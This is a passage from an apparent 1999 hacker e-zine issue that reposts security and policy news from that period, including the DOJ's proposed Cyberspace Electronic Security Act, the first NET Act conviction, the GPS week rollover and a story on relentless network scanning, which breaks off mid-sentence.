This is our world now... the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals. We explore... and you call us criminals. We seek
after knowledge... and you call us criminals. We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.
I am a hacker, and this is my manifesto. You may stop this indiv-
idual, but you can't stop us all... after all, we're all alike.
+++The Mentor+++
Racketeers

==============================================================================




02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("
Read commented source!\n\n");

/* This issue includes an article by Dragos Ruiu that is well worth the read
* it is entitled "
Stealth Coordinated Attack HOWTO" as mentioned in the header
* and outlines various attack methods employed by todays hacker used to scope
* out and penetrate your systems. The article can be found in section 42.0
*
* As always we welcome your stories, articles and poetry, please send them with any
* information about yourself you see fit or would like included to the address below...
*
* Please, send your submissions to: hwa@press.usmc.net thank you.
*
* Cruciphux
*/
printf ("
EoF.\n");
}



Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 DOJ contemplates secret searches
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

SECRET SEARCHES FROM DOJ
by BHZ, Tuesday 24th August 1999 on 2:34 pm CET
InfoWar published a briefing on public policy issues written by Center for Democracy
and Technology (www.cdt.org). "
The Justice Department is planning to ask Congress
for new authority allowing federal agents armed with search warrants to secretly break
into homes and offices to obtain decryption keys or passwords or to implant 'recovery
devices' or otherwise modify computers to ensure that any encrypted messages or
files can be read by the government". Read the briefing here.


8/23/99

DOJ Proposes Secret Searches


C D T P O L I C Y P O S T

A BRIEFING ON PUBLIC POLICY ISSUES
AFFECTING CIVIL LIBERTIES ONLINE
from
THE CENTER FOR DEMOCRACY AND TECHNOLOGY

Volume 5, Number 19 August 20, 1999


CONTENTS:
(1) Justice Department Proposes Secret Searches of Homes, Offices
(2) If the Government Wants Your Data, It Should Come to You For It
(3) Proposal Also Sets Standards for Access to Escrowed Keys
(4) Subscription Information
(5) About the Center for Democracy and Technology

** This document may be redistributed freely with this banner intact **
Excerpts may be re-posted with permission of ari@cdt.org This document is also available at:
http://www.cdt.org/publications/pp_5.19.html



(1) JUSTICE DEPARTMENT PROPOSES SECRET SEARCHES OF HOMES, OFFICES

The Justice Department is planning to ask Congress for new authority allowing federal agents armed with search warrants to secretly break into homes
and offices to obtain decryption keys or passwords or to implant "
recovery devices" or otherwise modify computers to ensure that any encrypted messages
or files can be read by the government.

With this dramatic proposal, the Clinton Administration is basically saying: "
If you don't give your key in advance to a third party, we will secretly enter
your house to take it if we suspect criminal conduct."

The full text of the Justice Department proposal, a section-by-section analysis prepared by DOJ lawyers, and related materials are available at:
http://www.cdt.org/crypto/CESA.

The proposal has been circulating within the Clinton Administration since late June. On August 5, the Office of Management and Budget circulated it for
final interagency review. In the normal course, after all potentially interested agencies have been consulted, the proposal would be transmitted to Capitol
Hill, where it could be introduced by any Member, or offered as an amendment to pending legislation.



(2) IF THE GOVERNMENT WANTS YOUR DATA, IT SHOULD COME TO YOU FOR IT

The proposal is intended to eliminate a core element of our civil liberties. Normally, under the Fourth Amendment in the Bill of Rights, when the
government wants to search your home or office, the government must obtain a court order issued by a judge based on a finding of probable cause to
believe that a crime is being committed AND the government must provide you with contemporaneous notice of the search -- show you the warrant and
leave an inventory of the items seized.

This notice requirement has ancient roots. It is based on the notion that the judicial warrant (issued on the basis of the government agent's untested
assertions presented to a judge in private) does not provide adequate protection against abuse. Notice is important because it gives you the opportunity to
observe the conduct of the government agents and protect your rights. If the agents are exceeding the scope of the warrant, for example, you can even
rush down to the courthouse and ask a judge to stop the search. And after the search, you can exercise your rights for return of your property and
otherwise defend yourself.

Over time, our society has tolerated exceptions to this rule. For example, the government can enter secretly to plant bugs to pick up oral communications or
to bug your phone, but that is quite rare. Most wiretaps do not involve entry into the home. A few courts in a few cases have allowed so-called "
sneak and
peek" searches, in which government agents can enter surreptitiously, provided they don't take anything. And in the name of foreign counterintelligence, the
government has long conducted "
black bag jobs," such as the one in which they searched the home and computer of CIA employee Aldrich Ames.

The new DOJ proposal is a huge expansion of these previously narrowly defined exceptions. The proposal takes extraordinary cases at the fringes of the
law and makes them routine, given the increasingly ubiquitous nature of computers.

Thus, the encryption debate, which up until now has been about privacy and security in cyberspace, is becoming a struggle over the sanctity of the home.



(3) PROPOSAL ALSO SETS STANDARDS FOR ACCESS TO ESCROWED KEYS

The proposal also includes detailed procedures for government access to keys and other forms of decryption assistance stored with third parties. Again, the
essence of the DOJ proposal is government access to keys without the knowledge or cooperation of the crypto user.

The DOJ claims that these key recovery provisions provide greater protection for lawful users of encryption, by making it clear that a third party holding a
decryption key or other recovery information cannot disclose it or use it except in accordance with the procedures set forth in the Act. The DOJ-drafted
procedures are complicated and unique, turning on unanswered questions of what is "
generally applicable law" and what is a "constitutionally protected
expectation of privacy." They fall far short of protections proposed by Sen. Patrick J. Leahy (D-VT) in the Electronic Rights for the Twenty-First Century
(E-RIGHTS) bill, S. 854, described at http://www.cdt.org/crypto/legis_106/ERIGHTS/

In any case, few individuals use third party key recovery, and there seems to be little individual or corporate interest in key recovery for communications,
so even the strictest procedures for access to escrowed keys would be vastly outweighed by the proposed secret searches of homes and offices.

In the small comfort department, the DOJ proposal makes it clear that key escrow or third party key recovery would not be mandatory.



(4) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting civil liberties online and how they will affect you! Subscribe to the CDT Policy Post
news distribution list. CDT Policy Posts, the regular news publication of the Center for Democracy and Technology, are received by Internet users,
industry leaders, policymakers, the news media and activists, and have become the leading source for information about critical free speech and privacy
issues affecting the Internet and other interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

majordomo@cdt.org

In the BODY of the message (leave the SUBJECT LINE BLANK), type

subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the above address with NOTHING IN THE SUBJECT LINE and a BODY TEXT of:

unsubscribe policy-posts



(5) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest organization based in Washington, DC. The Center's mission is to develop and
advocate public policies that advance democratic values and constitutional civil liberties in new computer and communications technologies.

Contacting us:

General information: info@cdt.org
World Wide Web: http://www.cdt.org/

Snail Mail: The Center for Democracy and Technology
1634 Eye Street NW * Suite 1100 * Washington, DC 20006
(v) +1.202.637.9800 * (f) +1.202.637.0968


End Policy Post 5.19

Aleksandr Gembinski
Webmaster etc.
Center for Democracy and Technology
1634 Eye Street, NW
11th Floor
Washington, DC 20006
(v) +1.202.637.9800
(f) +1.202.637.0968
http://www.cdt.org/


@HWA

04.0 FIRST NET CONVICT WILL DO NO TIME
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/


by Thejian, Monday 23rd August 1999 on 9:30 pm CET
The University of Oregon student who last Friday pled guilty to felony cyber-crime
charges and in so doing became the first-ever person convicted under the No
Electronic Theft (NET) Act, will not do any jail time. The student will be sentenced
Nov. 2 - and although he faces a maximum of three years in jail for his conviction on
one count of "
criminal infringement or reproduction" of commercial software - his plea
arrangement assures that he will not see the inside of a jail cell, altough he still is
saddled with a felony conviction according to the deputy chief of DOJ's computer
crime division. Story on Newsbytes

First NET Convict Will Do No Time - Update




By David McGuire, Newsbytes
WASHINGTON, DC, U.S.A.,
23 Aug 1999, 12:31 PM CST

A University of Oregon student convicted of distributing pirated software over the Internet will not spend any
time in jail under a plea agreement with Department of Justice attorneys.

The student last Friday pled guilty to felony cyber-crime charges and in so doing became the first-ever person convicted
under the decade-old the No Electronic Theft (NET) Act, Newsbytes reported last week.

The student was accused of pilfering thousands of business and entertainment programs and posting them, free-of-charge,
on his Website, said David Greene, deputy chief of Justice's computer crime division.

Before the NET Act was passed, prosecutors had to prove that cyber- thieves received "
commercial benefits" from their
thefts in order to win convictions. But the NET Act closed that loophole.

The student will be sentenced Nov. 2 - and although he faces a maximum of three years in jail for his conviction on one
count of "
criminal infringement or reproduction" of commercial software - his plea arrangement assures that he will not see
the inside of a jail cell, Greene said.

Still, he is saddled with a felony conviction, and Greene hopes coverage of the case will deter other software pirates, he
said.

Earlier this year, some congressional Republicans questioned why there had been no Department of Justice prosecutions
under the NET Act. DoJ called yesterday's conviction a clear message that Justice is enforcing the law.

"
We are not going to bring hundreds of these cases," Greene said. But DoJ is "trying to discourage (computer piracy) as a
hobby."

While such thefts may seem comparatively innocuous, they have "
done some real damage to software companies," Greene
said.

Reported by Newsbytes.com, http://www.newsbytes.com .

12:31 CST
Reposted 12:31 CST


ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2318386,00.html?chkpt=hpqs014

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Feds convict first Internet pirate
By Reuters
August 20, 1999 5:22 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2318386,00.html?chkpt=hpqs014

WASHINGTON -- An Oregon college student who gave away music, movies and software on
the Web has become the first person convicted of a felony under a law punishing Internet
copyright piracy, the government said Friday.

Jeffrey Gerard Levy, 22, a senior at the University of Oregon in Eugene, pleaded guilty
to violating the No Electronic Theft Act of 1997, the U.S. Justice Department announced.

The Justice Department said Levy admitted that in January of this year he "
illegally posted
computer software programs, musical recordings, entertainment software programs and digitally
recorded movies on his Internet Web site, allowing the general public to download and copy
these copyrighted products."

A Justice Department official said there was no evidence that Levy had made any profit from
the freely available works.

Anybody who distributes 10 or more copyrighted works with a value of more than $2,500 can
face up to three years in prison and a fine of up to $250,000.

Levy faces sentencing Nov. 2.

@HWA


05.0 NORTON ANTIVIRUS 2000 IS OUT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/


by BHZ, Tuesday 24th August 1999 on 3:17 pm CET
Symantec (www.symantec.com) published Norton Utilities 2000, Norton AntiVirus
2000, and Norton CleanSweep 2000. Norton AntiVirus 2000 has two new features -
support for automatic scanning of incoming e-mail attachments from POP-based
applications such and it can automatically eliminate viruses in multiple compressed
file levels, such as a Zip file inside another Zip file.

@HWA

06.0 SSL CPU CONSUMPTION CAUSES CONCERNS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/


by Thejian, Tuesday 24th August 1999 on 11:50 am CET
A recently released study by research and consulting firm Networkshop, found that
various combinations of servers, processors, operating systems and online content
used in conjunction with Secure Sockets Layer (SSL) can hamper the performance of
Web servers. SSL helps secure e-commerce transactions, but these new findings
suggest that its CPU consumption may end up impeding those same transactions.
Full story


SSL's CPU appetite causes concern
Amy Rogers

Washington, D.C. - Secure Sockets Layer (SSL) technology helps secure
E-business transactions, but its voracious consumption of CPU space may end
up impeding those same transactions.

In a study released this summer, research and consulting firm Networkshop,
Ottawa, found that various combinations of servers, processors, operating
systems and online content used in conjunction with SSL can hamper the
performance of Web servers.

Networkshop paired Linux, Windows NT and Sun Microsystems Inc. Solaris
with Web servers including Apache, Stronghold and Microsoft Corp.'s Internet
Information Server.

Windows NT plus Intel Corp. processors tended to better handle the task of
processing SSL's complex algorithms, he said.

Slow performance could lead to frustrated or lost customers, so VARs
implementing E-business solutions might want to examine several types of
products that offload encryption processing from the server itself to another
device.

These products include PC cards or server cards, such as Rainbow
Technologies Inc.'s CryptoSwift; encryption-offloading units that sit on the
network, such as those from nCipher Corp.; and so-called Internet Commerce
Appliances, such as IPivot Inc.'s Commerce Director 8000. Such devices,
including IPivot's Commerce Accelerator 1000, an entry-level version of
Commerce Director, free up Web servers to perform tasks other than crunching
numbers.

CryptoSwift offloads 200 SSL transactions per second, said Bob Bova, director
of business development at Rainbow Technologies, Irvine, Calif. Rainbow is
seeking resellers that add "
significant value to security technology" to add to its
stable of partners. Already 15 VARs and integrators are on board, he said.

Copyright ® 1999 CMP Media Inc.


07.0

  
Bug in Bill Gate's Anus?
~~~~~~~~~~~~~~~~~~~~~~~~

Aug 27th

SmoG sent this in...

http://support.microsoft.com/isapi/support/pass.idc?Product=Bill%20Gates%20Anus

In case it has been replaced by the time you read this the following headlined
a bug report form on Microsoft's tech support page

"Do you think you've found a bug in Microsoft Bill Gates Anus?"

With the submission form following the header...


@HWA


08.0 CESA Causing Outrage In Libertarians
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by AlienPlague
The 'Cyberspace Electronic Security Act', which HNN
has previously reported on, is drawing much criticism
and causing outrage amongst civil libertarians and
high-tech industry trade groups. They say that the act
not only violates Civil Rights, but "would make police
break-ins far more common than they are now." While
law enforcement agencies claim that encryption is
detrimental to their job of tracking criminals and crime,
most seem to feel that it is just another way the
current administration will attempt to impose 'big
brother' monitoring powers over American citizens.

MSNBC
http://www.msnbc.com/news/302945.asp

Furor rising over PC wiretap plan
Civil libertarians, trade groups outraged by DOJ proposal that
would ‘booby-trap’ PCs. But will Congress go ‘ballistic’?
By Maria Seminerio
ZDNN

Aug. 20 — A U.S. Department of Justice proposal
to make it easier for police to break into homes
and access computers is drawing a furious
reaction from civil libertarians and high-tech
industry trade groups.



THE DRAFT LEGISLATION, for which the DOJ
hopes to find a sponsor in Congress, is dubbed the
Cyberspace Electronic Security Act. The law would make it
easier for law enforcement officials to obtain from judges a
now-rarely-used authorization to break into a suspect’s
home and plant a hidden listening device.
But in this case, the computer equivalent of the
“listening device” is the authorization for investigators to
disable data-scrambling encryption programs on PCs. (In
order to actually copy data from the computer, police
would still need a separate warrant from a judge.)


DOJ wants clearance to bug PCs

”(The proposal) strikes at the heart of the Bill of
Rights,” said David Sobel, general counsel for the Electronic
Privacy Information Center.
Noting that judges in all federal and state courts
combined only issued 50 warrants for so-called
“surreptitious physical entries” last year, Sobel said
extending such authorization to cases involving computer
files “would make police break-ins far more common than
they are now.”

‘BOOBY-TRAP YOUR COMPUTER’
The proposal would “basically allow investigators to
booby-trap your computer ahead of time” by disabling
encryption, he said.
The proposal was most likely spurred by the frustration
investigators have experienced when finding encrypted data
on computers used by suspected drug dealers and other
criminals, he added.
DOJ officials did not respond to requests for interviews
Friday. But in a letter to House Speaker Dennis Hastert,
Acting Assistant Attorney General Jon Jennings said the
new law would aid investigators when information needs to
be deciphered “in a timely manner.”
“While under existing law, law enforcement is provided
with different means to collect evidence of illegal activity,
these means are rendered wholly insufficient when
encryption is used,” wrote Jennings in the letter.
“In the context of law enforcement operations, stopping
a terrorist attack or seeking to recover a kidnapped child,
time is of the essence and may mean the difference between
success and catastrophic failure.
“While existing means of obtaining evidence would
remain applicable in a fully-encrypted world, the failure to
provide law enforcement with the necessary ability to obtain
the plain-text version of the evidence makes existing
authorities useless,” he wrote.

EPIC: CONGRESS WILL GO ‘BALLISTIC’
Noting that the proposal would need to find a sponsor
in Congress and then be passed into law before it could
take effect, EPIC’s Sobel said it could encounter resistance
by lawmakers.
“I think people in Congress are going to go ballistic
over this, particularly since it’s coming right on the heels of
the FIDNET” controversy, he said. FIDNET — the
controversial proposal to monitor government and some
private networks for hacking activity — came to light earlier
this summer and remains in limbo.


Barry Steinhardt, president of the American Civil
Liberties Union, said that the Federal Bureau of
Investigation has often misused its powers in the past, and
could do so again under the DOJ proposal.
“There’s every reason to believe they’re not just going
to look at the Mob using the powers sought under the
proposal,” Steinhardt said. “They’ll use this power to
interfere with protected speech.”
Also condemning the plan were the Computer and
Communications Industry Association, the Center for
Democracy and Technology, and Americans for Computer
Privacy.

CLINTON ADMIN: BIG BROTHER?
The plan is “an unprecedented attempt by the Clinton
administration to impose ‘big brother’ monitoring powers
over American citizens,” ACP officials said in a statement.
“The fact is that current laws provide law enforcement
broad powers to obtain information.”
“This is another attempt by law enforcement to do an
end-run (around encryption),” said Ed Black, president of
the CCIA. “It offers a real temptation for investigators to
overreach and overextend” the current limits on searches
and seizures, he said.
“Anybody’s vulnerable,” Black added. ”(This)
resembles something the KGB would propose.”


@HWA

09.0 ReDaTtAcK Arrested, Questioned, Charged, Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Wizzy24
After electronically breaking into the General Bank of
Belgium, ReDaTtAcK has been apprehended. He was
traced via his cell phone and then arrested and later
released. He has not been charged with computer
intrusion as Belgium has no such law. Instead he will be
charged with electronic eavesdropping charges after
breaking into SkyNet a Belgian ISP run by the state
owned telephone company Belgacom. ReDaTtAcK has
stated that he will continue to do what he does.

The Standard - Dutch
http://www.standaard.be

@HWA

10.0 Some GPS Systems Fail With Date Rollover
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
While the GPS satellites themselves and most GPS
receivers continued to function normally some units
failed when the GPS date rolled over this past weekend.
Many Japanese users of in car navigation systems
experienced complete systems failure when the date
rolled over. Four Japanese manufacturers of GPS
systems have completed updating a little over half of
the GPS systems sold in the country since 1996.

Yahoo News
http://dailynews.yahoo.com/h/nm/19990822/tc/gps_japan_1.html

Sunday August 22 1:10 AM ET

Irate Japanese Car Drivers Hit By GPS Bug

TOKYO (Reuters) - A steady stream of irate customers called Japanese car navigation makers Sunday after their
automotive directional devices failed due to a computer flaw.

The screens on some car navigation systems went blank while others froze up as a computer bug struck Global Positioning System (GPS)
devices, electronics company Pioneer Electronic Corp said. Pioneer, one of several car navigation system makers battling the bug, had
received several hundred phone calls since the problem started at 9 a.m., a spokeswoman said.

About 450 Pioneer workers manned telephone lines and staffed service centers over the weekend to help customers with the GPS problem, she said.

Some 95,000 car navigation units sold in Japan may be unable to cope with an internal date change in the system, the Ministry of International Trade and Industry
said.

Four Japanese manufacturers of GPS systems have completed updating only about 170,000 of the estimated 260,000 units sold in Japan since 1996 and believed to
be still in operation.

Japanese drivers are heavily reliant on the navigational devices because most streets in urban centers such as Tokyo are unnamed and follow curving paths laid out
among a tangle of property lines.

Japan's Maritime Safety Agency has received reports that ships with older GPS systems are in or near territorial waters but has not received any distress calls as of
Sunday noon, a spokesman said.

At midnight GMT, the 24 satellites of the Global Positioning System, which provide navigational data from 17,700 kilometers (11,000 miles) out in space, switched
their timing system back to zero.

The rollover is because the system, which uses radio signals from satellites to provide navigation data, was designed to ignore calendar dates but keep precise time
measured in seconds and weeks.

Only 1,024 weeks were allotted from January 6, 1980, before the system is reset to zero.

@HWA

11.0 Security Search Engine MindSec Goes Online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Erik
www.mindsec.com goes live today, providing a search
engine to search 90 different sites that are security and
administration related. MindSec will also have product
reviews on admin and security applications and
hardware.

MindSec
http://www.mindsec.com

@HWA

12.0 CIA Ex-Director Security Clearance Revoked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Erik
John Deutch, former director of the CIA, has had his
security clearance revoked after it was found that he
kept classified material on his home PC.

Yahoo News
http://dailynews.yahoo.com/h/nm/19990822/tc/cia_3.html

Sunday August 22 12:02 AM ET

CIA Suspends Ex-Director Deutch Security Clearance

WASHINGTON (Reuters) - The CIA has suspended security clearance for its former director, John Deutch, who was found to have kept
classified material on a computer at his home.

A CIA statement Friday said clearance for Deutch, the Central Intelligence Agency director for 20 months up to December 1996, had been
suspended ``for an indefinite period of time.''

The decision followed a review of the case by the current director, George Tenet, and a decision by the Justice Department in April not to prosecute Deutch.

The statement said that although a report by the CIA's Inspector General ``found no evidence that national security information was lost, the potential for damage to
U.S. security existed.''

Newsweek reported in April that 31 classified documents were discovered on a computer at his home in a routine check after Deutch, a pillar of the Washington
establishment for decades, left the agency.

Deutch issued a statement through the CIA Friday saying: ''...I erred in using CIA-issued computers that were not configured for classified work to compose
classified documents and memoranda.''

He said: ``Although I accept responsibility for my mistake, I want to make clear that I never considered the information to be at risk or intended to violate security
precautions. But good intentions simply are not enough. Strict compliance is the standard.''

Earlier this year Deutch was appointed to head a commission reviewing security at science laboratories after reports of Chinese spying at nuclear facilities but he
withdrew as reports of his own misuse of classified materials emerged.

@HWA

13.0 GAO Releases Report on Risk Assement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
In an attempt to give federal agencies some sort of
guideline on how to secure their systems the
Government Accounting Office has released the
Information Security Risk Assessment: Practices of
Leading Organizations report. The report details security
programs used by four unnamed organizations, which
included oil, financial and computer companies and one
federal regulatory agency. The report goes on to
identify seven critical factors of a successful ongoing
security risk-assessment program.

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0823/fcw-newsgao-08-23-99.html

General Accounting Office
http://www.gao.gov

FCW;


AUGUST 23, 1999


GAO report tries to sort out risk-assessment
confusion

BY DIANE FRANK (diane_frank@fcw.com)

Facing growing security threats to increasingly complex government
computer systems, the General Accounting Office last week released a report
to help federal agencies determine how vulnerable their systems are and how
to make them more secure.

Although GAO's report, "Information Security Risk Assessment: Practices of
Leading Organizations," does not present specific suggestions for agencies to
determine how to secure systems from cyberattacks, it identifies seven critical
factors of a successful ongoing security risk-assessment program, including
defining and documenting procedures and results.

The report details programs put in place by four unnamed organizations, which
included oil, financial and computer companies and one federal regulatory
agency. GAO did not name the organizations because it feared that hackers
might target them. The report also includes diagrams detailing the
risk-assessment process for each organization and a description of how they
made their decisions.

For example, the regulatory agency conducts risk assessments "to determine
the applicable security controls," the GAO reported. "This is done by
determining which of a pre-defined set of controls is appropriate for individual
business operations and comparing what is appropriate to controls already in
place to identify and address gaps."

The best practices outlined in the report will be helpful, especially at smaller
civilian agencies that do not have the resources that department-level agencies
have, said John Gilligan, chief information officer at the Energy Department
and co-chairman of security on the CIO Council's Critical Infrastructure,
Privacy and Security Committee.

"I think it will be useful for people who are charged with risk management to
have examples of what others are doing," he said.

This is especially true because security and risk assessment are not
one-size-fits-all concepts, said Mike Lortz, vulnerability assessment product
manager at Internet Security Systems Inc. "The process needs to be different
from agency to agency...but the agencies need to be able to use something as
a guideline," he said.

GAO intends the report to be a supplement to last year's executive guide on
information security management. Risk assessment is only one of the five areas
outlined in last year's guide, but GAO decided to focus its latest guide on that
area because it is what most people in government seem to be worried about,
GAO said.

"When we did the original guide, during the exposure draft period we got
some comments that [said] we should dig deeper into some of these areas,
and more comments mentioned risk assessment than any others," said Jean
Boltz, assistant director of governmentwide and defense information systems
within GAO's Accounting and Information Management Division.

Agencies have been confused about how to conduct risk assessment and
apply that to the security needs they have, Boltz said, especially after the
Office of Management and Budget revised its computer security regulations in
1996 and eliminated the requirement to perform risk assessments. Agencies
have been confused about what to do because, although OMB no longer
requires risk assessments, it still requires agencies to measure their systems'
vulnerability to cyberattacks and unauthorized access and then base their
security architecture on that knowledge, Boltz said.

Agencies' confusion about risk assessment has heightened because of the
increasing use of the Internet and because computer systems are becoming
more interdependent, Gilligan said. "Risk assessment is a big deal because it
has not been institutionalized," Gilligan said. "In the past, there had been great
emphasis on doing risk assessment, but [it] tended over time to not be used or
not be done well."

@HWA

14.0 CESA Drives People to Freedom
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Jordan
The Cyberspace Electronic Security Act, a recent
proposal, which if it became law, would allow law
enforcement agents to break into your personal PC, is
forcing people to seek out ways to protect themselves.
One of the methods people have been looking at is
Freedom from Zero Knowledge Systems. While the
software is still in Beta it promises complete anonymity
on the internet. Freedom Beta 3 is nearing completion
and is slated for release during the first week in
September. The new beta will have increased
functionality, stability and ease of use.

Freedom
http://www.zks.net/clickthrough/click.asp?partner_id=542
Zero Knowledge CESA Info Page
http://www.zeroknowledge.com/cesa/

CNN
http://www.cnn.com/TECH/computing/9908/18/freedom/

Total digital privacy may be
on the horizon

August 18, 1999
Web posted at: 5:32 p.m. EDT (2132 GMT)


In this story:

How it works

Freedom gets high marks

U.S. encryption policy has its pros and
cons

RELATED STORIES, SITES




By Robin Lloyd
CNN Interactive Senior Writer

(CNN) -- If American software
developers were to touch any of the
code in the 10,000 released beta
versions of an Internet privacy
solution that is getting good
preliminary marks, they would be
subject to prosecution.

In fact, if Zero-Knowledge Systems
were based in the United States, it
would be illegal for the company to
export its Internet privacy software,
dubbed 'Freedom.'

Instead, the Montreal-based start-up,
headed up by 26-year-old Austin Hill, is set to release the first product of its
kind -- a comprehensive Internet privacy package that offers multiple online
pseudonyms and Byzantine encrypted rerouting that even Zero-Knowledge
couldn't crack if it wanted to.

No more cookies, e-mail trails and digital identity stealing. At least, that's the
idea. More than a dozen "cookie killers" already exist, along with several
e-mail and browser anonymity services such as anonymizer.com.

Those all rely on what Hill calls a "trust-me" mechanism. A third party server
holds users' identity and data. Freedom makes it so the end-user has sole
possession of that data.

"If there was a gun to my head, I still could not reveal or break the privacy
of my users," Hill says.

The user has the only "key" to their pseudonyms, which can be linked to
independent e-mail addresses, geographic locations and encryption keys.

Freedom is designed to protect the e-mail, chats, browsing and newsgroup
searches of anyone from a Chinese dissident posting pro-democracy
messages to an employee checking out listings for Alcoholics Anonymous.

The software can encrypt private chats and newsgroup discussions, ensures
anonymous Web browsing and can even block spam, Hill says. Each digital
identity relies on full strength encryption that ranges from 128 to 4,096 bits.

Freedom 1.0, which works only on Windows platforms, is set for release in
late October or early November. It will be downloadable for $49.95.
Macintosh and Linux versions are due out next year. Freedom doesn't work
with America Online, however, since AOL is an online service separate from
the Internet.

Zero-Knowledge released 1,000 beta copies of Freedom at the DefCon 7
convention in Las Vegas last month. Since then, it has released thousands
more via its Web site. A total of 50,000 people have requested copies since
then.

How it works

Web users leave traces of their identity behind every time they visit a Web
site or send e-mail. To get a sense of the process, visit the Center for
Democracy and Technology's site and use its demo.

Freedom allows users to set up separate pseudonyms for different aspects
of their lives -- an identity for an online chat about health care, another for
interactions with friends and family, others for Internet browsing and finally a
'true' identity for e-commerce.

Zero-Knowledge is working on an e-commerce identity protection solution
for future versions.

Freedom scrambles data coming from a user's PC and hides the source and
destination of Internet traffic routed through the service.

The message or data packet is first sent to Zero-Knowledge's servers where
it is wrapped in a layer of encryption.

That initiates a delivery process where the data bounces from one
independently owned relay station to the next and can only be opened by
one specific user who then forwards it to another specific user, with that
process repeating several times.

Eventually a data packet goes to its intended target but neither snoopers, nor
the final recipient, have any way of tracing its origins.

Third-party protections, the approach relied upon by Freedom's
predecessors, can be hacked or bought away when the company makes a
new acquisition, as was the case when Double Click acquired Abacus, Hill
said. Or, civil lawsuits can force ISPs to turn over their records.

Freedom gets high marks

David Sobel, general counsel for the Electronic Privacy Information Center,
and Ari Schwartz, a policy analyst with the Center for Democracy and
Technology, agree that Freedom is a good solution.

"I suspect that it is one of the best solutions that we've seen," Sobel said.
Freedom's strength comes from Hill's philosophical commitment to
preserving privacy and anonymity on the Internet, Sobel said.

Schwartz underlined the Center's stance on Internet privacy -- software
solutions combined with self-regulation among service providers and
legislation will be needed to protect privacy online.

The U.S. Congress has introduced several bills this session relating to online
privacy but advocates say they may not go far enough.

A CDT report concludes that online privacy is the exception, not the rule, in
the private sector.

U.S. encryption policy has its pros and cons

The U.S. policy that prohibits encryption exports and labor is based on
protecting security codes produced and cracked by the FBI and other
national security agencies.

The downside is that we may lose out on what has turned into a $1.5 billion
cryptography business for Canada, where limits are less strict, Hill says.

The U.S. approach could backfire and result in a brain drain of encryption
experts, EPIC's Sobel said.

"The end result will be that American companies will lose leadership in this
field," he said, "and it is not going to result in encryption being out of the
hands of anyone our government might be concerned about."

@HWA


15.0 Who's doing the Scanning?
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
Netsentry.net and all IPs in the 38.x.x.x range appear to
be systematically scanned. Owners of machines in that
range, which is controlled by PSINet want action to be
taken, but what action? So far scanning is not illegal, so
what can be done? And who is doing the scans and
why?

MSNBC
http://www.msnbc.com/news/302835.asp

Scanning for trouble
Relentless computer ‘probes’ cause concern, but no damage
yet
By Bob Sullivan
MSNBC





Aug. 23 — Dragos Ruiu was just minding his own
business, a Vancouver software start-up, when it
started. Day after day, relentlessly, someone or
some group out there on the Internet is banging
away at his servers, sneaking in and gaining full
access. A security expert, he knows what’s
happening: He’s being probed. Is this mere sport,
or a “casing,” like a bank robber who visits the
bank several times to study its security systems
before the heist?

EVERY DAY they come, they lurk — then they leave
without doing damage. And Ruiu is powerless to stop it. Every
method he has tried, they have trumped. They’re toying with
him. “They must feel like gods,” he says.
They come at him through clients’ computers, through
Canadian ISPs, once even through one of the largest Canadian
banks. They hack into Linux boxes, NT boxes, Unix boxes.
Hack by day or night. No matter.
And all for no apparent reason. They look, but don’t
touch.
Ah, the life of a network administrator these days. There
are thousands of ways to break into a computer, and there are
now several downloadable software packages designed to
scan the Internet for Web sites and servers that have just one
flaw.



According to Peter Tippett at computer security research
firm ICSA, a new box connected to the Net will almost
certainly be “scanned” before one week goes by. And the
amount of scanning activity has doubled in the past six months.
That’s about when the scanning started for Brandon
Pepelea, a former employee at PSINet who says his collection
of Web sites has been scanned systematically several times a
week since January. In another example of a victimless probe,
Pepelea thinks someone or something has been banging
through all the Internet addresses between 38.240.x.x and
38.200.x.x, a so-called Class-B range of addresses that
constitute about 16,000 possible computers.
In his case, the scans were unsuccessful. Whoever or
whatever it is, they haven’t been able to break into Pepelea’s
computers. Still, the relentless, systematic nature of the probe
